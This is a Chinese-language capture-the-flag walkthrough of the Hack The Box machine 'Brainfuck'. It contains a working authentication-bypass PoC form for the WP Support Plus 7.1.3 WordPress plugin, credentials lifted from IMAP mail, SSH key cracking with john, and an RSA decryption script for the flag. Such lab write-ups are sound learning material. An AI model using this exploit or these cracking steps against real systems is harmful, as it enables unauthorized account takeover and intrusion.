Brainfuck
Enumeration
Nmap
扫描发现对外开放了 22,25,110,143,443 五个端口,使用 nmap 扫描端口详细信息
┌──(kali㉿kali)-[~/vegetable/HTB/Insane]
└─$ nmap -sC -sV -p 22,25,110,143,443 -oA nmap 10.10.10.17
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-29 02:54 EST
Nmap scan report for 10.10.10.17
Host is up (0.35s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94d0b334e9a537c5acb980df2a54a5f0 (RSA)
| 256 6bd5dc153a667af419915d7385b24cb2 (ECDSA)
|_ 256 23f5a333339d76d5f2ea6971e34e8e02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) CAPA AUTH-RESP-CODE USER RESP-CODES UIDL PIPELINING TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE more LITERAL+ IMAP4rev1 ID LOGIN-REFERRALS listed OK have IDLE capabilities post-login AUTH=PLAINA0001 Pre-login SASL-IR
443/tcp open ssl/https nginx/1.10.0 (Ubuntu)
| tls-alpn:
|_ http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.07 secondsnmap 揭示 443 端口,有很多域名,将 brainfuck.htb,www.brainfuck.htb,sup3rs3cr3t.brainfuck.htb 全部都添加到 /etc/hosts 文件中,在访问 www.brainfuck.htb 时发现站点使用了 wordpress,版本为 4.7.3,在源码中发现使用了 wp-support-plus-responsive-ticket-system 的插件,版本为 7.1.3
src='https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/asset/js/public.js?version=7.1.3&ver=4.7.3'>博客的用户是 admin,还发现了一个邮箱 orestis@brainfuck.htb
搜索该插件发现一个权限提升漏洞,exploit-db 描述因为错误使用 wp_set_auth_cookie(),所以可以在不知道密码的情况下以任意用户登录系统,PoC如下
<form method="post" action="http://wp/wp-admin/admin-ajax.php">Username: <input type="text" name="username" value="administrator"><input type="hidden" name="email" value="sth"><input type="hidden" name="action" value="loginGuestFacebook"><input type="submit" value="Login">
</form>在访问一下 sup3rs3cr3t.brainfuck.htb,显示是一个秘密论坛,点击其中的帖子得到了 orestis 和 admin 用户名,先回到刚才发现的 wordpress 插件的漏洞
Exploitation
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation
这个表单只是用来生成正确 POST 请求的,所以修改其中的 url 地址,修改 username 和 email 的值,然后将该 PoC 保存为 auth.html
┌──(kali㉿kali)-[~/vegetable/HTB/Linux/Brainfuck]
└─$ cat auth.html
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">Username: <input type="text" name="username" value="admin"><input type="hidden" name="email" value="orestis@brainfuck.htb"><input type="hidden" name="action" value="loginGuestFacebook"><input type="submit" value="Login">
</form>然后利用python的HTTP服务访问该html,按如下方式执行
┌──(kali㉿kali)-[~/vegetable/HTB/Linux/Brainfuck]
└─$ python3 -m http.server --bind 127.0.0.1 80
Serving HTTP on 127.0.0.1 port 80 (http://127.0.0.1:80/) ...接着,可以在浏览器中访问,点击login
需要等一会,页面会显示空白,但是burpsuite中显示已经设置了cookie,获得一个cookie后
刷新页面,再次访问 https://brainfuck.htb,右上角显示我们以amdin用户的身份登录了系统
查看插件会发现4个插件,发现了一个叫Easy WP SMTP的插件
点击settings可以发现一组用户名和密码
点击邮件检查,可以直接从源码中看到密码
imap
在计算领域,Internet 消息访问协议是一种 Internet 标准协议,电子邮件客户端使用该协议通过 TCP/IP 连接从邮件服务器检索电子邮件消息,获得用户名和密码,尝试从邮箱中获取一些其他信息
首先使用telnet连接服务
┌──(kali㉿kali)-[~]
└─$ telnet brainfuck.htb 143
Trying 10.10.10.17...
Connected to brainfuck.htb.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.在 IMAP 中,每个命令都由一个唯一的标识符标识,用于跟踪和匹配服务器对该命令的响应,因此先输入 a1 LOGIN orestis kHGuERB29DNiNE 登录,然后使用 a2 LIST "" "*" 列出邮件服务器上所有的邮件箱
a1 LOGIN orestis kHGuERB29DNiNE
a1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
a2 LIST "" "*"
* LIST (\HasNoChildren) "/" INBOX
a2 OK List completed (0.000 + 0.000 secs).接下来使用标识符 a3 尝试查看(examine)名为 "INBOX" 的邮件箱 a3 EXAMINE INBOX,在其中发现存在两封邮件
a3 EXAMINE INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS ()] Read-only mailbox.
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1493461609] UIDs valid
* OK [UIDNEXT 5] Predicted next UID
* OK [HIGHESTMODSEQ 4] Highest
a3 OK [READ-ONLY] Examine completed (0.000 + 0.000 secs).使用命令 a4 FETCH 1 BODY[] 读取第一封邮件的内容,使用命令 a5 FETCH 2 BODY[] 读取第二封邮件的内容,在其中发现了 sup3rs3cr3t.brainfuck.htb 站点的登录凭证
a5 FETCH 2 BODY[]
* 2 FETCH (BODY[] {514}
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)Hi there, your credentials for our "secret" forum are below :)username: orestis
password: kIEnnfEKJ#9UmdORegards
)
a5 OK Fetch completed (0.001 + 0.000 secs).使用凭证成功登陆了论坛系统,看到了两个不一样的内容
vigenere decode
点击admin,里面有一些乱码样的话,还有其他的,在下面也有提到“SSH Access已升级为使用密钥,密码登录已永久禁用”
Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)
mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sjaXua zxcbje iai c leer nzgpg ii uy...如果点击orestis,发现也差不多,用了某种加密让别人猜不到说了什么
Si rbazmvm, Q'yq vtefc gfrkr nn ;)
Qbqquzs - Pnhekxs dpi fca fhf zdmgztUfgoqcbje....
Wejmvse - Fbtkqal zqb rso rnl cwihsfMya qutf de buj otv rms dy srd vkdof :)
Pieagnm - Jkoijeg nbw zwx mle grwsnn但是发现,在加密对话之前,orestis都有下面红框中的一句话作为结尾,猜测上面三条的第二行对应的也是这句“Orestis - Hacking for fun and profit”
尝试使用 cyberchef,选择 vigenere decode,因为大概能猜得到这几个名字应该都是 orestis,所以将key设置为 orestis,结果中已经出现了类似于 brainfuck 的东西,key 可能是 mybrainfuck,fuckmybrain,brainfuckmy 之类的东西
在使用fuckmybrain作为key时,可以发现其中有这样一句话,得到了一个链接
尝试下载该密钥
然后使用john来破解密码
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh2john id_rsa > john_rsa┌──(kali㉿kali)-[~/Downloads]
└─$ john john_rsa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia! (id_rsa)
1g 0:00:00:05 DONE (2024-01-02 04:30) 0.1908g/s 2377Kp/s 2377Kc/s 2377KC/s 3prash0..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.然后可以尝试登录ssh
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh -i id_rsa orestis@10.10.10.17
The authenticity of host '10.10.10.17 (10.10.10.17)' can't be established.
ED25519 key fingerprint is SHA256:R2LI9xfR5z8gb7vJn7TAyhLI9RT5GEVp76CK9aoKnM8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.17' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantage0 packages can be updated.
0 updates are security updates.You have mail.
Last login: Mon Oct 3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ RSA decode
在 orestis 主目录除了 user.txt 还能发现其他文件,output.txt 被标记为 Encrypted Password
orestis@brainfuck:~$ ls
debug.txt encrypt.sage mail output.txt user.txt
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182还有一个 encrypt.sage,是一个脚本,这段代码使用 Python 中的 SageMath(数学软件包)来实现一个简单的 RSA 加密过程,RSA的加密是求 e 次方的 mod n
可以看到程序读取了 root.txt ,然后将字符串转化成整型,生成两个大随机数 p 和 q,令 p 和 q相乘得到 n,然后求出 e,最后加密 root.txt,并将其保存到 output.txt,并且将 p,q,e 都保存到了 debug.txt 中
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:e = ZZ.random_element(phi)c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
可以利用 stackexchange 的帖子,更新代码中的各项值
def egcd(a, b):x,y, u,v = 0,1, 1,0while a != 0:q, r = b//a, b%am, n = x-u*q, y-v*qb,a, x,y, u,v = a,r, u,v, m,ngcd = breturn gcd, x, ydef main():p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182# compute nn = p * q# Compute phi(n)phi = (p - 1) * (q - 1)# Compute modular inverse of egcd, a, b = egcd(e, phi)d = aprint( "n: " + str(d) );# Decrypt ciphertextpt = pow(ct, d, n)print( "pt: " + str(pt) )if __name__ == "__main__":main()运行python脚本,结果如下所示
┌──(kali㉿kali)-[~/vegetable/HTB/Linux/Brainfuck]
└─$ python rsa_rev.py
n: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt: 24604052029401386049980296953784287079059245867880966944246662849341507003750要从10进制转化成ascii码,可以利用以下程序,由此可以计算得出 root.txt 的值
┌──(kali㉿kali)-[~/vegetable/HTB/Linux/Brainfuck]
└─$ python3 -c "print(bytes.fromhex(format(24604052029401386049980296953784287079059245867880966944246662849341507003750, 'x')).decode('utf-8'))"6efc1a5dbb8904751ce6566a305bb8ef参考链接:
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation - PHP webapps Exploit (exploit-db.com)
RSA given q, p and e? - Cryptography Stack Exchange
